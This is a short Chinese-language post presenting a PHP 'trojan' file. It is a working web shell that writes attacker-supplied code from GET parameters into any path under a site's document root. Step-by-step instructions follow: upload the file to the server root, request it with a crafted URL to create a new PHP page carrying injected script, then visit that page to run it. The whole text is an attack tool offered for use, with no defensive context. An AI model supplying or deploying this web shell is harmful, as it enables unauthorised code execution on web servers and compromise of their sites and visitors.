php木马攻击文件
php木马文件代码
<?php $path = $_GET['path']; $code = $_GET['code']; $myfile = fopen($_SERVER['DOCUMENT_ROOT'].$path, "w") or die("Unable to open file!"); fwrite($myfile, $code); fclose($myfile); echo 'success' ?>
参数1:$path 创建的文件路径名,例 /a.php
参数2:$code 创建文件代码, 例 <script>alert();</script>
将木马文件上传至服务器,并访问传入参数。
例:
上传木马文件 c.php 至网站根目录下,访问并传入参数
在根目录下,创建a.php文件,并写入代码<script>alert();</script>
访问传参地址: http://www.XXXX.com/c.php?path=/a.php&code=<script>alert();</script>
在访问http://www.XXXX.com/a.php,即刚创建好的文件,执行代码。